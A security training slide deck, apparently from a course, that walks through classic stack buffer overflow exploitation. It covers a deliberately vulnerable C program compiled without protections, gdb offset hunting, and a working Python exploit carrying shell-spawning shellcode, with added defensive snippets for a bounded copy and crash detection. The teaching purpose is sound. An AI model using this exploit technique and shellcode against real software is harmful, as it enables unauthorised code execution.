03 - Refresher on buffer overflow in the old days
Alexandre Moneger
* Classic BoF exploitation, without any OS mitigations in place
* Assumptions and limits
1.
Thank you Aleph One!
Refresher on buffer overflow in the old days
Alex Moneger, Security Engineer
2.
Buffer overflow refresher
First paper by Aleph One in 1996 in Phrack #49: http://www.phrack.org/issues.html?issue=49&id=14
No OS level protections at the time
Works by writing past the buffer end, aka stuffing more data into a buffer than it can hold
Goal is to overwrite some interesting control structure with our attacker data. Can be saved EIP, but can be any function pointer
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
3.
Stack refresher (again ;))
Stack holds local variables, the address of the previous frame, the address of where to return to
Goal is to overwrite Saved EIP (referred to as SEIP)
If we control SEIP, we control where the "ret" instruction will go, meaning we control EIP
[Figure: stack frame, top to bottom: SEIP, SEBP, Local function storage]
4.
The "classic"
cisco@kali:~/src/seccon/ch3$ pygmentize -g ch3.c
#include <string.h>

int vuln(char *stuff)
{
    char buf[0x64] = {0};
    strcpy(buf, stuff);
    return 1;
}

int main(int argc, char **argv)
{
    vuln(argv[1]);
    return 0;
}
"buf" has no boundary checking. "stuff" is attacker controlled
[Figure: stack frame, top to bottom: SEIP, SEBP, buf]
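The defect is the unbounded strcpy() into buf. As an added example (not part of the deck's ch3.c), here is a bounded counterpart that keeps the same 0x64-byte local buffer and reports when the input would not have fit; copy_bounded, vuln_fixed and feed_pattern are names chosen here, and the 'A'-filled inputs in feed_pattern mirror the payloads used on the later slides.

```c
#include <stddef.h>
#include <string.h>

#define BUF_SIZE 0x64   /* same 100-byte local buffer as ch3.c */

/* Copy src into dst[dstsz], always NUL-terminating and never writing past
 * the end of dst. Returns how many bytes of src were dropped (0 = it fit). */
size_t copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0)
        return n;
    if (n >= dstsz) {
        memcpy(dst, src, dstsz - 1);
        dst[dstsz - 1] = '\0';
        return n - (dstsz - 1);
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Hardened counterpart of vuln(): the copy is bounded by sizeof buf, so
 * SEBP and SEIP above buf can no longer be reached. Returns 1 when the
 * input fit, 0 when it was too long (buf still holds a safe, truncated copy). */
int vuln_fixed(const char *stuff)
{
    char buf[BUF_SIZE] = {0};
    size_t dropped = copy_bounded(buf, sizeof buf, stuff);
    /* ... normal work on buf would go here ... */
    return dropped == 0;
}

/* Test helper: feed vuln_fixed() a constructed input of n 'A' bytes,
 * the same kind of filler the slides pass to ch3 on the command line. */
int feed_pattern(size_t n)
{
    char input[256];
    if (n >= sizeof input)
        n = sizeof input - 1;
    memset(input, 'A', n);
    input[n] = '\0';
    return vuln_fixed(input);
}
```

With the bound in place, the 116-byte payload the slides derive later is simply refused, while anything up to 99 bytes plus the NUL still fits.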
5.
Making it exploitable
Previous program compiled with the following options:
cisco@kali:~/src/seccon/ch3$ sudo sysctl -a | grep randomize
kernel.randomize_va_space = 0
cisco@kali:~/src/seccon/ch3$ cc ch3.c -fno-stack-protector -z execstack -U_FORTIFY_SOURCE -g -o ch3
See how many security features we are disabling?
Pretend we don't have sources, find the size of the local stack storage in the function prologue
cisco@kali:~/src/seccon/ch3$ objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 10 | grep --color esp
 804841d:  89 e5      mov ebp,esp
 8048421:  83 c4 80   add esp,0xffffff80
cisco@kali:~/src/seccon/ch3$ python -c 'import exutil as e; print e.cmp2(0xffffff80)'
-128
6.
Recon
Local storage for the function is 128 bytes. Nothing says that our vulnerable buf starts at the beginning of that
Let's figure out how much we need to overwrite to control EIP
Max overwrite size = ebp - esp + SEBP + SEIP = 128 + 4 + 4 = 136
[Figure: stack frame, top to bottom: SEIP, SEBP, ????, buf, ????; the local storage spans 128 bytes]
7.
Finding the offsets manually
cisco@kali:~/src/seccon/ch3$ python -c 'print "A =>", hex(ord("A")), "B =>", hex(ord("B"))'
A => 0x41 B => 0x42
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*132+"B"*4')) || dmesg | tail -n 1
Segmentation fault
[613635.624345] ch3[18312]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*128+"B"*4')) || dmesg | tail -n 1
Segmentation fault
[613642.976497] ch3[18318]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*124+"B"*4')) || dmesg | tail -n 1
Segmentation fault
[613663.605595] ch3[18325]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14
cisco@kali:~/src/seccon/ch3$ # Continue decrementing by 4
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*112+"B"*4')) || dmesg | tail -n 1
Segmentation fault
[613678.429167] ch3[18331]: segfault at 42424242 ip 42424242 sp bffffd00 error 14
Doing this properly => use msf pattern_create.rb & pattern_offset.rb
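The dmesg lines above are also what a defender sees after such a crash. As an added example (not from the deck), this C helper parses kernel "segfault at" lines and flags the ones where the faulting address equals the instruction pointer and is a single repeated filler byte: the signature of a saved return address that was overwritten with input. The parser assumes the line layout shown on this slide; parse_segfault, is_repeated_byte and classify_segfault are names chosen here.

```c
#include <stdio.h>
#include <string.h>

/* Fields of a Linux kernel segfault message as shown by dmesg, e.g.
 *   [613635.624345] ch3[18312]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14
 * The kernel prints addr/ip/sp and the error code in hex; on x86 error 0x14
 * means a user-mode instruction fetch, i.e. the CPU tried to execute there. */
struct segfault {
    char comm[32];
    int pid;
    unsigned long addr, ip, sp, error;
};

/* Parse one dmesg line. Returns 1 on success, 0 if it is not a segfault line. */
int parse_segfault(const char *line, struct segfault *sf)
{
    const char *p = strchr(line, ']');   /* skip the "[timestamp]" prefix if present */
    p = p ? p + 1 : line;
    while (*p == ' ')
        p++;
    return sscanf(p, "%31[^[][%d]: segfault at %lx ip %lx sp %lx error %lx",
                  sf->comm, &sf->pid, &sf->addr, &sf->ip, &sf->sp, &sf->error) == 6;
}

/* True when a 32-bit value is one non-zero byte repeated four times
 * (0x41414141, 0x42424242, ...): a filler pattern that landed in EIP. */
int is_repeated_byte(unsigned long v)
{
    unsigned long b = v & 0xff;
    if (v == 0 || v > 0xffffffffUL)
        return 0;
    return v == (b | b << 8 | b << 16 | b << 24);
}

/* Classify a crash line. Returns:
 *   2  ip == faulting address AND ip is a filler pattern: control flow was
 *      redirected to a value taken straight from input (SEIP overwrite)
 *   1  ip == faulting address: instruction fetch from an unmapped address
 *   0  an ordinary data-access fault (ip is somewhere plausible)
 *  -1  not a segfault line at all */
int classify_segfault(const char *line)
{
    struct segfault sf;
    if (!parse_segfault(line, &sf))
        return -1;
    if (sf.ip != sf.addr)
        return 0;
    return is_repeated_byte(sf.ip) ? 2 : 1;
}
```

Run over the slide's four lines, the first three score 2 on 0x41414141 and the last on 0x42424242; a crash on a NULL read scores 0.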
8.
We're going to overflow!!!
1. Choose a shellcode
2. Compute its length, e.g. 40 bytes
3. Add the proper padding to overwrite SEIP: 112 - 40 = 72
4. Find the address of our shellcode
5. Append it to the buffer to redirect flow
[Figure: payload layout: Shellcode | Junk | SC Address]
9.
Finding buffer address
cisco@kali:~/src/seccon/ch3$ env -i gdb --quiet --args ./ch3 $(python -c 'print "A"*112+"BCDE"')
Reading symbols from /home/cisco/src/seccon/ch3/ch3...done.
gdb$ !objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 22 | tail -n 5
 804844e:  83 ec 80   sub esp,0xffffff80
 8048451:  5b         pop ebx
 8048452:  5f         pop edi
 8048453:  5d         pop ebp
 8048454:  c3         ret
gdb$ break *0x804844e
Breakpoint 1 at 0x804844e: file ch3.c, line 9.
gdb$ r
gdb$ x/16w $esp
0xbffffc70: 0xbffffc8c 0xbffffec9 0xb7ffeff4 0xbffffd70
0xbffffc80: 0xb7fffac0 0xbffffd44 0xb7feb662 0x41414141
0xbffffc90: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffca0: 0x41414141 0x41414141 0x41414141 0x41414141
gdb$ x/x 0xbffffc8c
0xbffffc8c: 0x41414141
gdb$ x/s 0xbffffc8c
0xbffffc8c: 'A' <repeats 112 times>, "BBBB"
gdb$ x/2w $ebp
0xbffffcf8: 0x41414141 0x42424242
gdb$ si 5
--------------------------------------------------------------------------[regs]
EAX: 00000001 EBX: 41414141 ECX: 00000000 EDX: 00000075 o d I t S z a P C
ESI: 00000000 EDI: 41414141 EBP: 41414141 ESP: BFFFFD00 EIP: 42424242
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
Error while running hook_stop:
Cannot access memory at address 0x42424242
0x42424242 in ?? ()
10.
Summary
We have the overflow length: 116 bytes (112 bytes + 4 bytes SEIP overwrite)
We have the buffer's address (0xbffffc8c)
We have a shellcode (I'm a nice guy)
Stuff all of it together
11.
Shell time
cisco@kali:~/src/seccon/ch3$ pygmentize ch3.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import struct

target = "ch3"
overflow_len = 112
ret_addr = 0xbffffc8c
target_path = os.path.abspath(target)

# setreuid(geteuid(),geteuid()); execve("/bin/sh",0,0)
sc = ("\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46"
      "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68"
      "\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80")

# pad the rest of the 112 bytes up to SEIP, then the address to return into
nop_sled = overflow_len - len(sc)
sc_addr = struct.pack("<I", ret_addr)
ex = "%s%s%s" % (sc, 'A'*nop_sled, sc_addr)
os.execve(target_path, (target_path, ex), os.environ)
12.
Result
cisco@kali:~/src/seccon/ch3$ invoke ch3.py
$ id
uid=1000(cisco) gid=1001(cisco) groups=1001(cisco)
$ exit
cisco@kali:~/src/seccon/ch3$
13.
Variations
Small buffers (shellcode doesn't fit): append the shellcode after the return address
[Figure: payload layout: SC Address | Junk | Shellcode]
Unpredictable buffer address (stack size is not under control): prepend a NOP sled to the shellcode
[Figure: payload layout: NOP sled | Shellcode | SC Address]
Use an environment variable to host your shellcode
14.
Limitations
Shellcode is executed on the stack, so the stack needs to be executable
Buffer address is known, so addresses can't be randomized
Stack frame is not protected (more on this later)
There are no null bytes in our buffer address (this can be fixed easily)
15.
Now get to work
Compile and exploit ch3
Try any different exploitation technique described previously
Don't use the "invoke" script when trying to exploit. What is happening to the stack? Why is your exploit failing?
Enable one memory protection (whichever). Check the effect on the exploit